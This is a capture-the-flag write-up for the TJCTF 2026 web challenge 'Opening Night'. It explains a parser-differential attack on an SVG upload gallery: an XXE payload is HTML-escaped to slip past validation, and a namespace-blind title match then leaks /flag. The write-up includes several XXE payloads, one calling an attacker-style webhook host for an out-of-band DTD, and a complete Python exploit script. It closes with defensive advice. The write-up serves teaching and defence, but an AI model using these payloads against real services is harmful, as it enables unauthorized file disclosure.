Web

TJCTF 2026: Opening Night

QA210 ยท May 2026 ยท SVG ยท Parser Differential ยท XXE
Challenge
Opening Night
Category
Web
CTF
TJCTF 2026
Solves
12
Our Place
3rd
Flag
tjctf{y0ur_4r7w0rk...}
โ†’ Upload SVG with fake-namespace title/desc โ†’ Label parser ignores namespace
โ†’ HTML-escape entire XML document โ†’ Gatekeeper sees text, not XML
โ†’ Backend calls html.unescape() before XML parse โ†’ DOCTYPE + Entity become real
โ†’ Entity expands in decoded XML โ†’ Flag in label output

Challenge Overview

The challenge presents a web gallery where users can upload SVG artwork. Each uploaded file is processed server-side: the SVG gets validated by a gatekeeper, and then metadata (title, description, dimensions) is extracted by a label writer and displayed on the gallery page. The key observation is that the output renders into three specific HTML sinks:

html
<h2>some title</h2>
<p>some description</p>
<dd>700 x 160</dd>

The challenge description says "The new gallery opens tonight." Three hints are provided that point toward a two-stage parsing pipeline with a differential vulnerability between the stages. Understanding how each stage interprets the uploaded file is the crux of this challenge. With only 12 total solves, this was one of the harder web challenges in the CTF, requiring a creative combination of two distinct bugs rather than a single straightforward vulnerability.

Hint 1

Two curators inspect each piece: one hangs the painting (carefully), the other writes the label (sloppily).

Hint 2

The gatekeeper only checks that your file looks like an SVG at the top. The label writer takes the first title/desc it sees by name, ignoring true namespace.

Hint 3

Don't look for hidden rooms, change how your art is "wrapped"! Payload must survive two interpretations: harmless text vs. XML.

Reading these hints together, a clear picture emerges:

Reconnaissance

Before attempting any exploit, we need to understand the full attack surface of the gallery application. Let's walk through the normal upload flow and observe how the server processes our input.

Normal Upload Flow

Uploading a minimal, valid SVG file:

xml โ€” normal.svg
<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">
  <title>My Artwork</title>
  <desc>A beautiful piece</desc>
  <rect width="100%" height="100%" fill="#1a1a2e"/>
  <text x="350" y="80" text-anchor="middle" fill="white" font-size="24">Hello World</text>
</svg>

The gallery page renders:

html โ€” rendered output
<h2>My Artwork</h2>
<p>A beautiful piece</p>
<dd>700 x 160</dd>

So the server extracts <title> โ†’ <h2>, <desc> โ†’ <p>, and dimensions โ†’ <dd>. The SVG image itself is also displayed. This confirms three output sinks we can potentially control.

Validation Behavior

Let's probe what the gatekeeper accepts and rejects. We test several malformed uploads:

TestResultInference
Plain text file with .svg extensionRejectedContent-type or structure is validated
SVG without xmlnsRejectedRequires proper SVG namespace
Valid SVG with <script> insideRejectedBlacklists dangerous elements
SVG with DOCTYPE declarationRejectedDOCTYPE is stripped or blocked
SVG with extra namespace elementsAcceptedNon-SVG namespaces are allowed
SVG with CDATA sectionAcceptedCDATA passes through
SVG with HTML entities in titleAccepted & decodedhtml.unescape() is applied

The critical findings: DOCTYPE declarations are rejected, but additional XML namespaces are allowed, and HTML entities are decoded. This immediately rules out straightforward XXE and points toward the namespace confusion + encoding differential approach.

The html.unescape() Discovery

One test reveals the second stage's behavior. We upload an SVG containing HTML entities in the title:

xml โ€” entity-test.svg
<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">
  <title>Test &amp; Entity &lt;script&gt;</title>
  <desc>Testing decode</desc>
</svg>

The rendered output shows:

output
h2: 'Test & Entity <script>'

The HTML entities &amp; and &lt; have been decoded โ€” &amp; became & and &lt; became a literal <script> tag. This proves the backend calls html.unescape() on the content before or during parsing. This is our attack vector.

Key Discovery

The server runs html.unescape() on the uploaded content before XML parsing. This means if we upload HTML-escaped XML, the gatekeeper sees harmless text, but after unescaping, the XML parser receives fully functional XML โ€” including DOCTYPE and entity declarations.

Bug 1: Namespace Confusion

Hint 2 tells us the label writer "takes the first title/desc it sees by name, ignoring true namespace." This means the metadata extraction uses a namespace-blind selector โ€” likely Python's ElementTree.find("title") or an XPath like //*[local-name()="title"].

In XML, namespaces exist precisely to disambiguate elements with the same local name. A proper SVG parser should only match {http://www.w3.org/2000/svg}title, not {urn:not-svg}title. But the label writer doesn't check namespaces, so we can inject a title element in a fake namespace that the label parser will still match.

xml โ€” namespace-inject.svg
<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">
  <metadata>
    <x:title xmlns:x="urn:not-svg">INJECTED_TITLE</x:title>
    <x:desc xmlns:x="urn:not-svg">INJECTED_DESC</x:desc>
  </metadata>
  <title>SAFE_TITLE</title>
  <desc>SAFE_DESC</desc>
</svg>

The server renders:

output
h2: 'INJECTED_TITLE'
p : 'INJECTED_DESC'

Despite <x:title> belonging to the urn:not-svg namespace, the label parser matched it. The SVG validation also accepted it because non-SVG namespaced elements are permitted inside <metadata>. We now have full control over the label content โ€” but this alone doesn't give us the flag. We need a way to introduce dynamic content expansion (reading a file from the server).

Why Not Just Inject File Content Directly?

We control the label text, but we can only put static strings there. We need XML entity expansion to dynamically include file contents at parse time. But DOCTYPE declarations are blocked by the gatekeeper... or are they?

Dead Ends

Before arriving at the correct solution, I explored every alternative attack vector. Documenting these failures is important โ€” they demonstrate why the parser differential approach is the only viable path.

Raw DOCTYPE Doesn't Expand

Since we control the label, the natural next step is XML entity expansion. We try uploading a document with an internal entity declaration:

xml โ€” attempt 1: internal entity (FAILED)
<!DOCTYPE svg [
  <!ENTITY e "ENTITY_OK">
]>
<svg xmlns="http://www.w3.org/2000/svg">
  <metadata>
    <x:title xmlns:x="urn:not-svg">&e;</x:title>
  </metadata>
</svg>

The output is devastating:

output
h2: '&e;'

The entity reference &e; is not expanded โ€” it appears as a literal string. This is devastating and leads many solvers to conclude entity expansion is impossible. But we're just hitting the gatekeeper: the DOCTYPE is being stripped during validation, so the XML parser never sees the entity declaration.

External XXE and XInclude Blocked

xml โ€” attempt 2: external entity (FAILED)
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///flag">
]>
<svg xmlns="http://www.w3.org/2000/svg">
  <metadata>
    <x:title xmlns:x="urn:not-svg">&xxe;</x:title>
  </metadata>
</svg>
xml โ€” attempt 3: OOB XXE (FAILED)
<!DOCTYPE svg [
  <!ENTITY % dtd SYSTEM "http://attacker.webhook.site/evil.dtd">
  %dtd;
]>
<svg xmlns="http://www.w3.org/2000/svg">
  ...
</svg>
xml โ€” attempt 4: XInclude (FAILED)
<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xi="http://www.w3.org/2001/XInclude">
  <metadata>
    <x:title xmlns:x="urn:not-svg">
      <xi:include href="file:///flag" parse="text"/>
    </x:title>
  </metadata>
</svg>

Every external access vector fails:

Not SSTI or Multipart Confusion

Every straightforward attack vector fails. The solution requires understanding the two-stage processing pipeline at a deeper level.

Breakthrough: Parser Differential

Returning to Hint 3 โ€” "Payload must survive two interpretations: harmless text vs. XML" โ€” we now have all the pieces. The question is: how can the same bytes be harmless text to one parser but valid XML to another?

The breakthrough is HTML-encoding. If we HTML-escape the entire XML document before uploading, the gatekeeper sees only escaped text โ€” no XML tags, no DOCTYPE, nothing suspicious. But the backend calls html.unescape() before passing the content to the XML parser, reconstructing the original XML with all its entity declarations intact.

Consider what happens when we HTML-escape an XML document:

Original XML (what we WANT the backend to see)
<!DOCTYPE svg [<!ENTITY flag SYSTEM "file:///flag">]>
<svg xmlns="http://www.w3.org/2000/svg">...</svg>
After html.escape() (what we ACTUALLY upload)
&lt;!DOCTYPE svg [&lt;!ENTITY flag SYSTEM &quot;file:///flag&quot;&gt;]&gt;
&lt;svg xmlns=&quot;http://www.w3.org/2000/svg&quot;&gt;...&lt;/svg&gt;

After HTML-escaping, all < become &lt;, all > become &gt;, all & become &amp;. The gatekeeper inspects this and sees only escaped text โ€” no XML structure, no DOCTYPE, nothing to validate or reject. The file passes through as harmless content.

Then the backend performs html.unescape(), which reverses every HTML entity back to its original character. The XML parser receives the clean, unescaped document โ€” complete with DOCTYPE and entity declarations โ€” and processes it normally.

Parser Differential โ€” Formal Definition

A parser differential vulnerability occurs when two components process the same input differently due to different parsing rules, encoding assumptions, or processing stages. In this case, the gatekeeper treats the raw bytes as text (seeing no XML structure), while the label writer first unescapes and then parses as XML (seeing a complete document with entities). This semantic gap is the vulnerability.

Why External Entities Work After Unescaping

The earlier failure happened because the gatekeeper was stripping the DOCTYPE before the XML parser ever saw it. The parser received a document without entity declarations, so &flag; was treated as an undefined entity and rendered literally.

Now, with the HTML-escape bypass, the gatekeeper never sees the DOCTYPE because it's hidden behind HTML entities. The html.unescape() step reconstructs the DOCTYPE after validation has already passed. The XML parser then receives the full document with entity declarations and expands them.

The server likely uses lxml.etree with network resolution disabled but local file resolution enabled โ€” a common misconfiguration that allows file:// URIs in SYSTEM entities while blocking http://.

python โ€” likely server code
# Stage 1: Gatekeeper โ€” validates raw upload
raw = request.files['svg_file'].read()
if has_doctype(raw):          # Checks for <!DOCTYPE in raw bytes
    reject("DOCTYPE not allowed")
if not is_valid_svg(raw):     # Checks for <svg> tag structure
    reject("Invalid SVG")

# Stage 2: Label Writer โ€” unescapes, then parses
decoded = html.unescape(raw.decode())    # &lt; โ†’ <, &amp; โ†’ &, etc.
tree = etree.fromstring(decoded)          # Now sees DOCTYPE + entities!
title = tree.find(".//title")             # Namespace-blind search
desc = tree.find(".//desc")

Final Exploit

Payload Construction

Because the HTML-unescape step happens before XML parsing, we can now place a DOCTYPE declaration at the very start of the document โ€” the only position where it's valid in XML. After unescaping, the XML parser sees a proper DTD with entity definitions and expands them accordingly.

The complete payload before HTML-escaping:

xml โ€” desired backend XML
<!DOCTYPE svg [
  <!ENTITY flag SYSTEM "file:///flag">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">
  <metadata>
    <x:title xmlns:x="urn:not-svg">&flag;</x:title>
    <x:desc xmlns:x="urn:not-svg">Opening Night Gallery</x:desc>
  </metadata>
  <title>Safe Title</title>
  <desc>Safe Description</desc>
  <rect width="100%" height="100%" fill="white"/>
</svg>

Breaking down every component:

Applying HTML-Escape

Now we HTML-escape the entire document. Every <, >, &, and " gets converted to its HTML entity equivalent:

text โ€” what we actually upload
&lt;!DOCTYPE svg [
  &lt;!ENTITY flag SYSTEM &quot;file:///flag&quot;&gt;
]&gt;
&lt;svg xmlns=&quot;http://www.w3.org/2000/svg&quot; width=&quot;700&quot; height=&quot;160&quot;&gt;
  &lt;metadata&gt;
    &lt;x:title xmlns:x=&quot;urn:not-svg&quot;&gt;&amp;flag;&lt;/x:title&gt;
    &lt;x:desc xmlns:x=&quot;urn:not-svg&quot;&gt;Opening Night Gallery&lt;/x:desc&gt;
  &lt;/metadata&gt;
  &lt;title&gt;Safe Title&lt;/title&gt;
  &lt;desc&gt;Safe Description&lt;/desc&gt;
  &lt;rect width=&quot;100%&quot; height=&quot;100%&quot; fill=&quot;white&quot;/&gt;
&lt;/svg&gt;

Pay special attention to &amp;flag; โ€” this is the HTML-escaped form of &flag;. After html.unescape(), &amp; becomes &, so the XML parser sees &flag;, which it then expands as an entity reference.

Complete Exploit Flow

  1. HTML-escape the entire XML document โ€” every <, >, &, and quote character gets converted to its HTML entity equivalent.
  2. Upload the escaped content as image/svg+xml.
  3. Gatekeeper inspects the raw bytes โ€” sees only &lt;, &gt;, &amp; sequences. No <!DOCTYPE pattern. No <svg> tag. Passes validation as harmless text.
  4. Backend calls html.unescape() โ€” all HTML entities are decoded back to their original characters. The full XML document is reconstructed.
  5. XML parser receives the clean document with <!DOCTYPE svg [<!ENTITY flag SYSTEM "file:///flag">]> and processes the entity declaration.
  6. Entity expansion โ€” &flag; resolves to the contents of /flag on the server's filesystem.
  7. Label parser extracts the expanded entity value via namespace-blind find("title") match and renders it in the <h2> tag.
  8. Flag appears in the gallery page output.
Flag

tjctf{y0ur_4r7w0rk_is_n0w_0n_displ4y}

Exploit Code

python โ€” solve.py
#!/usr/bin/env python3
"""
TJCTF 2026 โ€” Opening Night
Parser Differential via HTML-escape โ†’ unescape โ†’ XML entity expansion
Author: QA210  |  3rd solve / 12 total
"""
import html
import re
import sys
import requests

TARGET = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:5000"
FLAG_PAT = re.compile(r"tjctf\{[^}]+\}", re.IGNORECASE)


def craft_svg_payload():
    """
    Build the raw XML with DOCTYPE + external entity, then HTML-escape it.

    The raw XML contains:
    - DOCTYPE with SYSTEM entity pointing to /flag
    - Fake-namespace title/desc that the label parser matches
    - Entity reference &flag; in the fake-namespace title

    After html.escape(), the gatekeeper sees only escaped text.
    After html.unescape() on the backend, the XML parser sees the full
    document and expands &flag; to the file contents.
    """
    raw_xml = (
        '<!DOCTYPE svg [\n'
        '  <!ENTITY flag SYSTEM "file:///flag">\n'
        ']>\n'
        '<svg xmlns="http://www.w3.org/2000/svg" width="700" height="160">\n'
        '  <metadata>\n'
        '    <x:title xmlns:x="urn:not-svg">&flag;</x:title>\n'
        '    <x:desc xmlns:x="urn:not-svg">QA210 Gallery</x:desc>\n'
        '  </metadata>\n'
        '  <title>Safe</title>\n'
        '  <desc>Safe</desc>\n'
        '  <rect width="100%" height="100%" fill="white"/>\n'
        '</svg>\n'
    )
    # The critical step: HTML-escape the entire document once.
    # Gatekeeper sees escaped text; backend unescapes before XML parse.
    return html.escape(raw_xml, quote=True).encode("utf-8")


def find_upload_endpoint(session):
    """Discover the upload form action and file field name."""
    r = session.get(f"{TARGET}/")
    action_m = re.search(r'action="([^"]*)"', r.text)
    field_m = re.search(r'name="([^"]*)".*type="file"', r.text)
    if not action_m or not field_m:
        return f"{TARGET}/upload", "file"
    return f"{TARGET}{action_m.group(1)}", field_m.group(1)


def main():
    session = requests.Session()
    action_url, field_name = find_upload_endpoint(session)
    payload = craft_svg_payload()

    print(f"[*] Target:  {TARGET}")
    print(f"[*] Action:  {action_url}")
    print(f"[*] Field:   {field_name}")
    print(f"[*] Payload: {len(payload)} bytes (HTML-escaped XML)")

    resp = session.post(
        action_url,
        files={field_name: ("opening.svg", payload, "image/svg+xml")},
        allow_redirects=True,
        timeout=30,
    )

    match = FLAG_PAT.search(resp.text)
    if match:
        print(f"[+] FLAG: {match.group(0)}")
    else:
        print("[-] Flag not found in response.")
        for line in resp.text.splitlines():
            if "title" in line.lower() or "flag" in line.lower():
                print(f"    {line.strip()}")


if __name__ == "__main__":
    main()

Running the Exploit

bash
$ python3 solve.py https://opening-night.tjctf.org
[*] Target:  https://opening-night.tjctf.org
[*] Action:  https://opening-night.tjctf.org/upload
[*] Field:   svg_file
[*] Payload: 587 bytes (HTML-escaped XML)
[+] FLAG: tjctf{y0ur_4r7w0rk_is_n0w_0n_displ4y}

Key Takeaways

This challenge demonstrates a classic parser differential attack. When two components process the same data using different rules, the gap between their interpretations becomes an attack surface. Security decisions made by one parser can be completely undermined by transformations applied before the second parser.

HTML entity encoding is a representation, not a security boundary. Applying html.unescape() before parsing effectively nullifies any validation that was performed on the escaped form. The lesson: always validate the decoded form of input, not the encoded form.

Using namespace-blind XML selectors like find("title") instead of find("{http://www.w3.org/2000/svg}title") allows attackers to inject elements in fake namespaces that the parser still matches. Always use fully-qualified names when processing XML from untrusted sources.

Defensive Recommendations

1. Validate after decoding โ€” Never validate encoded input and then decode before use. Decode first, then validate the decoded form.
2. Use namespace-aware parsers โ€” Always match elements by their fully-qualified name including namespace URI.
3. Disable entity resolution โ€” Configure XML parsers with resolve_entities=False and no_network=True. For defense-in-depth, also strip DOCTYPE declarations server-side.
4. Use allowlists, not denylists โ€” Instead of blocking specific dangerous patterns (DOCTYPE, script tags), only allow known-safe structures.